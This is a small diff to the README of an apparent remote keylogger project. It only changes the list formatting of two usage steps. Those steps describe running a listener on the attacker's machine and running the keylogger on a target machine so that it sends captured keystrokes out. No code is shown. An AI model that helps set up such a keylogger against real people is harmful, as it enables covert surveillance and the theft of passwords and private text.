Houman7/Remote-Keylogger/README.md

 ## Usage

--Run the socket server with the attacker's IP and port set, on the attacker's machine to listen for incoming logs.
+- Run the socket server with the attacker's IP and port set, on the attacker's machine to listen for incoming logs.
--Run the Keylogger with attacker's IP and port set, on the target machine.
+- Run the Keylogger with attacker's IP and port set, on the target machine.